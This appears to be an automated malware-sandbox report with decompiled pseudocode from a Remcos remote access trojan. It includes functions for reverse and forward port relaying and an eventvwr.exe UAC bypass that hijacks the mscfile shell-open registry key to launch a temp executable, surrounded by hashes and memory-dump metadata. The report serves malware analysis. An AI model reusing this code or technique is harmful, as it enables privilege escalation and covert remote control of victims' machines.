                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$PF$StartForward$StartReverse$StopForward$StopReverse
                                                                                                • API String ID: 3578746661-1619240785
                                                                                                • Opcode ID: 90221b745ea4a08f8010f153d8bfae99a331e0b8465794eba684ab4e2742cb7b
                                                                                                • Instruction ID: bb15008153ed0e76a39fefa845b0c1b7df9a4d60d797f4aadd8c8bc5d4cf133f
                                                                                                • Opcode Fuzzy Hash: 90221b745ea4a08f8010f153d8bfae99a331e0b8465794eba684ab4e2742cb7b
                                                                                                • Instruction Fuzzy Hash: B351A671F042009BC614BB35D85AA6E36A55B85348F40453FF842A76E2EF7C9D09C78F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00411F62, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E00411F62(void* __ecx, char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
				short _v8;
				long _v12;
				long _t38;
				short _t39;
				void* _t40;
				void* _t41;
				signed short _t43;
				intOrPtr* _t44;
				intOrPtr _t45;
				void* _t47;
				void* _t48;
				char* _t50;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t63;
				intOrPtr* _t64;
				signed short _t69;
				intOrPtr* _t70;
				intOrPtr _t72;
				void* _t73;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				void* _t83;

				_t38 =  *"65535"; // 0x33353536
				_t80 = _a4;
				_v12 = _t38;
				_t39 =  *0x466898; // 0x35
				_v8 = _t39;
				if(_t80 == 0 || _a8 < 0x10) {
					L46:
					_t40 = 0x2afb;
					goto L47;
				} else {
					_t41 = 2;
					if( *_t80 == _t41) {
						_t63 = _a24;
						_t72 = _a20;
						_t78 = _a16;
						if(_a12 == 0 || _t78 == 0) {
							if(_t72 == 0 || _t63 == 0) {
								_t40 = 0x2af9;
								goto L47;
							} else {
								goto L8;
							}
						} else {
							L8:
							_t61 = _a28;
							_t43 = _t61 & 0x00000006;
							if(_t43 != 6) {
								if(_t72 == 0 || _t63 == 0) {
									L23:
									if(_a12 == 0 || _t78 == 0) {
										L44:
										_t40 = 0;
										goto L47;
									} else {
										_t44 =  *((intOrPtr*)(_t80 + 4));
										_a4 = _t44;
										if((_t61 & 0x00000002) == 0) {
											_t44 =  &_a4;
											__imp__#51(_t44, 4, 2);
											if(_t44 == 0) {
												L32:
												if((_t61 & 0x00000004) == 0) {
													_push(_a4);
													L39:
													__imp__#12();
													_t82 = _t44;
													L40:
													_t64 = _t82;
													_t36 = _t64 + 1; // 0x1
													_t73 = _t36;
													do {
														_t45 =  *_t64;
														_t64 = _t64 + 1;
													} while (_t45 != 0);
													if(_t78 <= _t64 - _t73) {
														goto L46;
													}
													E0043CAAC(_a12, _t78, _t82);
													goto L44;
												}
												__imp__#111();
												_t47 = _t44 - 0x2af9;
												if(_t47 == 0) {
													L36:
													_t40 = 0x2af9;
													goto L47;
												}
												_t48 = _t47 - 1;
												if(_t48 == 0) {
													_t40 = 0x2afa;
													goto L47;
												}
												if(_t48 == 1) {
													goto L46;
												}
												goto L36;
											}
											_t82 =  *_t44;
											if(_t82 == 0) {
												goto L32;
											}
											if((_t61 & 0x00000001) != 0) {
												_t50 = E004118EF(_t82, 0x2e);
												if(_t50 != 0) {
													 *_t50 = 0;
												}
											}
											goto L40;
										}
										_push(_t44);
										goto L39;
									}
								} else {
									_t69 =  *(_t80 + 2) & 0x0000ffff;
									_a8 = _t69;
									if((_t61 & 0x00000008) == 0) {
										_t74 = 0;
										_t52 =  ==  ? _t74 : "udp";
										_t43 = _t69 & 0x0000ffff;
										__imp__#56(_t43,  ==  ? _t74 : "udp");
										if(_t43 == 0 ||  *_t43 == 0) {
											_push(_a8);
											L18:
											__imp__#15();
											swprintf( &_v12, 6, "%u", _t43 & 0x0000ffff);
											_t75 =  &_v12;
											_t83 = _t83 + 0x10;
											goto L19;
										} else {
											_t75 =  *_t43;
											L19:
											_t70 = _t75;
											_a8 = _t70 + 1;
											do {
												_t57 =  *_t70;
												_t70 = _t70 + 1;
											} while (_t57 != 0);
											if(_a24 <= _t70 - _a8) {
												goto L46;
											}
											E0043CAAC(_a20, _a24, _t75);
											_t83 = _t83 + 0xc;
											goto L23;
										}
									}
									_push(_t69);
									goto L18;
								}
							}
							_t40 = 0x2726;
							goto L47;
						}
					} else {
						_t40 = 0x273f;
						L47:
						return _t40;
					}
				}
			}





























                                                                                                0x00411f67
                                                                                                0x00411f6e
                                                                                                0x00411f71
                                                                                                0x00411f74
                                                                                                0x00411f7a
                                                                                                0x00411f81
                                                                                                0x0041211c
                                                                                                0x0041211c
                                                                                                0x00000000
                                                                                                0x00411f91
                                                                                                0x00411f93
                                                                                                0x00411f97
                                                                                                0x00411fa7
                                                                                                0x00411faa
                                                                                                0x00411fad
                                                                                                0x00411fb0
                                                                                                0x00411fb8
                                                                                                0x00412115
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411fc6
                                                                                                0x00411fc6
                                                                                                0x00411fc6
                                                                                                0x00411fcb
                                                                                                0x00411fd0
                                                                                                0x00411fde
                                                                                                0x0041206e
                                                                                                0x00412072
                                                                                                0x00412111
                                                                                                0x00412111
                                                                                                0x00000000
                                                                                                0x00412080
                                                                                                0x00412080
                                                                                                0x00412083
                                                                                                0x00412089
                                                                                                0x00412092
                                                                                                0x00412096
                                                                                                0x0041209e
                                                                                                0x004120be
                                                                                                0x004120c1
                                                                                                0x004120e7
                                                                                                0x004120ea
                                                                                                0x004120ea
                                                                                                0x004120f0
                                                                                                0x004120f2
                                                                                                0x004120f2
                                                                                                0x004120f4
                                                                                                0x004120f4
                                                                                                0x004120f7
                                                                                                0x004120f7
                                                                                                0x004120f9
                                                                                                0x004120fa
                                                                                                0x00412102
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412109
                                                                                                0x00000000
                                                                                                0x0041210e
                                                                                                0x004120c3
                                                                                                0x004120ce
                                                                                                0x004120d0
                                                                                                0x004120dc
                                                                                                0x004120dc
                                                                                                0x00000000
                                                                                                0x004120dc
                                                                                                0x004120d2
                                                                                                0x004120d5
                                                                                                0x004120e0
                                                                                                0x00000000
                                                                                                0x004120e0
                                                                                                0x004120da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004120da
                                                                                                0x004120a0
                                                                                                0x004120a4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004120a9
                                                                                                0x004120ae
                                                                                                0x004120b7
                                                                                                0x004120b9
                                                                                                0x004120b9
                                                                                                0x004120b7
                                                                                                0x00000000
                                                                                                0x004120a9
                                                                                                0x0041208b
                                                                                                0x00000000
                                                                                                0x0041208b
                                                                                                0x00411fec
                                                                                                0x00411fec
                                                                                                0x00411ff0
                                                                                                0x00411ff6
                                                                                                0x00411ffd
                                                                                                0x00412006
                                                                                                0x0041200a
                                                                                                0x0041200e
                                                                                                0x00412016
                                                                                                0x00412021
                                                                                                0x00412024
                                                                                                0x00412024
                                                                                                0x00412039
                                                                                                0x0041203e
                                                                                                0x00412041
                                                                                                0x00000000
                                                                                                0x0041201d
                                                                                                0x0041201d
                                                                                                0x00412044
                                                                                                0x00412044
                                                                                                0x00412049
                                                                                                0x0041204c
                                                                                                0x0041204c
                                                                                                0x0041204e
                                                                                                0x0041204f
                                                                                                0x00412059
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412066
                                                                                                0x0041206b
                                                                                                0x00000000
                                                                                                0x0041206b
                                                                                                0x00412016
                                                                                                0x00411ff8
                                                                                                0x00000000
                                                                                                0x00411ff8
                                                                                                0x00411fde
                                                                                                0x00411fd2
                                                                                                0x00000000
                                                                                                0x00411fd2
                                                                                                0x00411f99
                                                                                                0x00411f99
                                                                                                0x00412121
                                                                                                0x00412127
                                                                                                0x00412127
                                                                                                0x00411f97

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: e902066c9ec7ebc4875e4e234c969e16d71dd7dcd59d5c1f52b40557385198f6
                                                                                                • Instruction ID: 99b905821392987c4229e0bc93f34ab7e78062dc25839c6468b263b2a361e60f
                                                                                                • Opcode Fuzzy Hash: e902066c9ec7ebc4875e4e234c969e16d71dd7dcd59d5c1f52b40557385198f6
                                                                                                • Instruction Fuzzy Hash: 1751E034600205ABDB259E28CA05BFB3B65AB49300F14822BFE01D7392D7BDCCE1D75A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00406114, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E00406114(void* __ebx, void* __ecx, void* __edx) {
				char _v28;
				char _v52;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t24;
				void* _t28;
				void* _t50;

				_t28 = __ecx;
				if( *0x46c9c0 != 0) {
					return 1;
				}
				_t8 = E004062B2(__ecx);
				__eflags = _t8 - 0x3a9f;
				if(_t8 < 0x3a9f) {
					_push(_t28);
					E00410911( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x460734);
					_t10 = E0040247B();
					_t11 = E00401F87(0x46e5f0);
					_t12 = E0040247B();
					_t14 = E00401F87( &_v28);
					E00410CAF(E00401F87(0x46e5a8), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
					_push(2);
					E00404260(__ebx, _t50 + 0x18 - 0x18, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe");
					_push(0x46079c);
					E00410B7B(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
					E004189FF( &_v52, 0x34, "eventvwr.exe");
					_t21 = ShellExecuteW(0, L"open", E00401EDD( &_v52), 0x46079c, 0x46079c, 0);
					__eflags = _t21 - 0x20;
					if(_t21 <= 0x20) {
						E00401EE2();
						E00401FB9();
						_t24 = 2;
						return _t24;
					}
					ExitProcess(0);
				}
				return _t8;
			}














                                                                                                0x00406114
                                                                                                0x00406122
                                                                                                0x00000000
                                                                                                0x00406126
                                                                                                0x0040612c
                                                                                                0x00406131
                                                                                                0x00406136
                                                                                                0x0040613c
                                                                                                0x0040614f
                                                                                                0x0040615d
                                                                                                0x00406165
                                                                                                0x0040616e
                                                                                                0x00406178
                                                                                                0x0040618f
                                                                                                0x00406197
                                                                                                0x004061a3
                                                                                                0x004061b2
                                                                                                0x004061b8
                                                                                                0x004061c7
                                                                                                0x004061e3
                                                                                                0x004061e9
                                                                                                0x004061ec
                                                                                                0x004061f9
                                                                                                0x00406201
                                                                                                0x00406208
                                                                                                0x00000000
                                                                                                0x00406208
                                                                                                0x004061f0
                                                                                                0x004061f0
                                                                                                0x0040620d

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 004061E3
                                                                                                • ExitProcess.KERNEL32 ref: 004061F0
                                                                                                Strings
                                                                                                • Software\Classes\mscfile\shell\open\command, xrefs: 004061AD
                                                                                                • eventvwr.exe, xrefs: 004061BD
                                                                                                • open, xrefs: 004061DC
                                                                                                • origmsc, xrefs: 0040617E
                                                                                                • mscfile\shell\open\command, xrefs: 00406142
                                                                                                • C:\Users\user\AppData\Local\Temp\rem9090sta.exe, xrefs: 0040619E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteExitProcessShell
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\rem9090sta.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                                • API String ID: 1124553745-1559938852
                                                                                                • Opcode ID: 90f2d167bed2b7ead40d1ddbcbca90368d114b847a1bcc328c62f1c577000627
                                                                                                • Instruction ID: 00780d1abf4c5647e31898de684db1996746f1de8a9c6afd1ab4477203dec792
                                                                                                • Opcode Fuzzy Hash: 90f2d167bed2b7ead40d1ddbcbca90368d114b847a1bcc328c62f1c577000627
                                                                                                • Instruction Fuzzy Hash: 7811F371A4410566D604B2A6CC57FBF32589B01709F20043FF907BA1D2FEBC588186DE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00419787, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00419787(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x46deb4 = E00419839();
				0x46deb0->cbSize = 0x1fc;
				 *0x46deb8 = 1;
				 *0x46dec0 = 0x401;
				 *0x46dec4 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x46dec8, "Remcos", 0x80);
				 *0x46debc = 7;
				Shell_NotifyIconA(0, 0x46deb0);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}






                                                                                                0x004197a0
                                                                                                0x004197ab
                                                                                                0x004197b9
                                                                                                0x004197c3
                                                                                                0x004197cd
                                                                                                0x004197ec
                                                                                                0x004197f1
                                                                                                0x004197fd
                                                                                                0x00419807
                                                                                                0x00419823
                                                                                                0x0041982a
                                                                                                0x00419832
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00419813
                                                                                                0x0041981d
                                                                                                0x0041981d
                                                                                                0x00419838

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004197A0
                                                                                                  • Part of subcall function 00419839: RegisterClassExA.USER32(00000030), ref: 00419885
                                                                                                  • Part of subcall function 00419839: CreateWindowExA.USER32 ref: 004198A0
                                                                                                  • Part of subcall function 00419839: GetLastError.KERNEL32 ref: 004198AA
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 004197D7
                                                                                                • lstrcpynA.KERNEL32(0046DEC8,Remcos,00000080), ref: 004197F1
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,0046DEB0), ref: 00419807
                                                                                                • TranslateMessage.USER32(?), ref: 00419813
                                                                                                • DispatchMessageA.USER32 ref: 0041981D
                                                                                                • GetMessageA.USER32 ref: 0041982A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: 05e4fb422e645131e176b4b0144c3208770c34772ffe40a69905eb6f47256127
                                                                                                • Instruction ID: b76965e78c36f775c0f56356684f8a08056b97e096fc346de85457ae77bda11a
                                                                                                • Opcode Fuzzy Hash: 05e4fb422e645131e176b4b0144c3208770c34772ffe40a69905eb6f47256127
                                                                                                • Instruction Fuzzy Hash: A8015EB1E04305ABD7109FA1ED0CE9B7BBCBBD5B0AF00002AF5019A161E7F9A485CB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00447787, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E00447787(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0043891F();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00438932())) = 9;
						L59:
						_t145 = E00437709();
						goto L60;
					}
					__eflags = _t213 -  *0x46da00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00440C6C(_t224, _t158);
								E004414D5(0);
								E004414D5(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00446077(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044E800(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E004388FC(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00438932())) = 9;
											 *(E0043891F()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E004472E3();
												} else {
													_t176 = E004475F3();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E004474A3(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00438932())) = 0xc;
									 *(E0043891F()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E004414D5(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0043891F()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00438932())) = 0x16;
							E00437709();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0043891F()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00438932())) = 0x16;
					goto L59;
				} else {
					 *(E0043891F()) =  *_t212 & 0x00000000;
					_t145 = E00438932();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                                                                                                0x00447790
                                                                                                0x00447797
                                                                                                0x004477b1
                                                                                                0x004477b3
                                                                                                0x00447b1b
                                                                                                0x00447b1b
                                                                                                0x00447b20
                                                                                                0x00447b20
                                                                                                0x00447b28
                                                                                                0x00447b2e
                                                                                                0x00447b2e
                                                                                                0x00000000
                                                                                                0x00447b2e
                                                                                                0x004477b9
                                                                                                0x004477bf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004477c7
                                                                                                0x004477d3
                                                                                                0x004477d6
                                                                                                0x004477d9
                                                                                                0x004477dc
                                                                                                0x004477e3
                                                                                                0x004477e6
                                                                                                0x004477ea
                                                                                                0x004477ed
                                                                                                0x004477f0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004477f6
                                                                                                0x004477f9
                                                                                                0x004477ff
                                                                                                0x00447819
                                                                                                0x0044781b
                                                                                                0x00447b17
                                                                                                0x00000000
                                                                                                0x00447b17
                                                                                                0x00447821
                                                                                                0x00447825
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044782b
                                                                                                0x0044782f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447836
                                                                                                0x0044783a
                                                                                                0x0044783d
                                                                                                0x00447840
                                                                                                0x00447845
                                                                                                0x00447845
                                                                                                0x00447848
                                                                                                0x00447865
                                                                                                0x0044786a
                                                                                                0x0044786c
                                                                                                0x0044786e
                                                                                                0x0044788e
                                                                                                0x0044788f
                                                                                                0x00447891
                                                                                                0x00447894
                                                                                                0x00447896
                                                                                                0x00447898
                                                                                                0x0044789a
                                                                                                0x0044789a
                                                                                                0x004478a5
                                                                                                0x004478a7
                                                                                                0x004478ae
                                                                                                0x004478b3
                                                                                                0x004478b6
                                                                                                0x004478b9
                                                                                                0x004478bb
                                                                                                0x004478e0
                                                                                                0x004478e5
                                                                                                0x004478ec
                                                                                                0x004478ef
                                                                                                0x004478f2
                                                                                                0x004478f6
                                                                                                0x004478f8
                                                                                                0x004478fc
                                                                                                0x004478fe
                                                                                                0x00447901
                                                                                                0x00447904
                                                                                                0x00447906
                                                                                                0x00447909
                                                                                                0x00447910
                                                                                                0x00447913
                                                                                                0x00447918
                                                                                                0x0044791b
                                                                                                0x00447924
                                                                                                0x00447928
                                                                                                0x0044792b
                                                                                                0x0044792e
                                                                                                0x00447931
                                                                                                0x00447937
                                                                                                0x00447939
                                                                                                0x00447942
                                                                                                0x00447945
                                                                                                0x00447948
                                                                                                0x0044794b
                                                                                                0x0044794c
                                                                                                0x00447950
                                                                                                0x00447956
                                                                                                0x00447960
                                                                                                0x00447965
                                                                                                0x00447975
                                                                                                0x00447979
                                                                                                0x0044797c
                                                                                                0x0044797e
                                                                                                0x00447980
                                                                                                0x00447982
                                                                                                0x00447984
                                                                                                0x0044798c
                                                                                                0x0044798d
                                                                                                0x00447990
                                                                                                0x00447993
                                                                                                0x00447994
                                                                                                0x0044799a
                                                                                                0x004479a4
                                                                                                0x004479ac
                                                                                                0x004479af
                                                                                                0x004479bb
                                                                                                0x004479bf
                                                                                                0x004479c2
                                                                                                0x004479c4
                                                                                                0x004479c6
                                                                                                0x004479c8
                                                                                                0x004479ca
                                                                                                0x004479d2
                                                                                                0x004479d3
                                                                                                0x004479d6
                                                                                                0x004479d9
                                                                                                0x004479d9
                                                                                                0x004479da
                                                                                                0x004479e0
                                                                                                0x004479ea
                                                                                                0x004479ea
                                                                                                0x004479c8
                                                                                                0x004479c4
                                                                                                0x004479af
                                                                                                0x00447982
                                                                                                0x0044797e
                                                                                                0x00447965
                                                                                                0x00447939
                                                                                                0x00447931
                                                                                                0x004479f0
                                                                                                0x004479f6
                                                                                                0x004479f8
                                                                                                0x00447a6b
                                                                                                0x00447a6b
                                                                                                0x00447a6f
                                                                                                0x00447a7f
                                                                                                0x00447a85
                                                                                                0x00447a87
                                                                                                0x00447ae3
                                                                                                0x00447ae3
                                                                                                0x00447aeb
                                                                                                0x00447aec
